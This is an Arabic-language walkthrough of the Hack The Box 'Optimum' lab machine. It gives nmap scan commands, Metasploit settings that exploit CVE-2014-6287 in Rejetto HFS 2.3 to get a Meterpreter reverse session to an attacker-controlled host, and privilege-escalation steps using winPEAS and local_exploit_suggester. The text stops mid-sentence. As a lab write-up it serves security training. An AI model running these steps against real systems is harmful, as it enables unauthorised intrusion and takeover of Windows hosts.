
شرح لجهاز Optimum من منصة Hack The Box. يغطي هذا الشرح استغلال ثغرة Rejetto HttpFileServer 2.3 (CVE-2014-6287) للحصول على وصول أولي، يليه تصعيد الامتيازات على مضيف Windows باستخدام تقنيات التعداد وأدوات ما بعد الاستغلال.
في هذا الجهاز، الهدف هو الحصول على وصول أولي إلى مضيف Windows عبر استغلال خدمة ويب ضعيفة ثم تصعيد الامتيازات للحصول على علم المسؤول.
اشتمل مسار الهجوم على:
نبدأ بفحص شامل لمنافذ TCP لتحديد الخدمات المكشوفة.
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>
يكشف الفحص أن المنفذ 80 مفتوح.
بعد ذلك، نجري فحصًا للإصدار والخدمة.
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>
تُعرّف النتيجة الخدمة التالية:
HttpFileServer 2.3
هذه الخدمة تقابل Rejetto HTTP File Server، وهو خادم ويب خفيف لمشاركة الملفات.
بعد البحث في الإصدار المكتشف، نجد ثغرة معروفة:
CVE-2014-6287
تتيح هذه الثغرة تنفيذ التعليمات البرمجية عن بُعد بسبب عدم كفاية تنظيف المدخلات.
لاستغلال الثغرة، نستخدم Metasploit.
ابدأ Metasploit:
msfconsole -q
ابحث عن الوحدة المناسبة:
search rejetto
حمّل وحدة الاستغلال:
use exploit/windows/http/rejetto_hfs_exec
اضبط الخيارات المطلوبة:
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run
بمجرد التنفيذ، يوفر الاستغلال جلسة Meterpreter على الجهاز الهدف.
مع جلسة Meterpreter التي حصلنا عليها، نتنقل في نظام الملفات لاسترجاع علم المستخدم.
cd
cat user.txt
whoami
يُظهر مخرج الأمر أننا سجّلنا الدخول باسم:
kostas
ولأن هذا المستخدم لا يملك صلاحيات إدارية، نتابع مع تصعيد الامتيازات.
لتحديد ناقلات تصعيد الامتيازات المحتملة، نرفع WinPEAS، وهي أداة معروفة لتعداد تصعيد الامتيازات في Windows.
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe
ثم نقوم بتشغيلها:
shell
.\wp.exe
يكشف المخرج معلومات مفيدة، بما في ذلك بيانات اعتماد مرتبطة بالمستخدم kostas.
بعد مراجعة ناقلات التصعيد الممكنة، نستخدم وحدة Metasploit:
local_exploit_suggester
حمّل الوحدة:
use post/multi/recon/local_exploit_suggester
اضبط الجلسة:
set SESSION <SESSION_NUMBER>
run
تقترح هذه الوحدة استغلالات محلية محتملة يمكن استخدامها لتصعيد الامتيازات.
بعد نجاح تصعيد الامتيازات، نحصل على شل بصلاحيات إدارية.
التحقق:
shell
whoami
بمجرد الحصول على صلاحيات إدارية، ننتقل إلى مجلد Administrator لاسترجاع علم المسؤول.
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt
يُظهر هذا الجهاز العديد من مفاهيم اختبار الاختراق المهمة: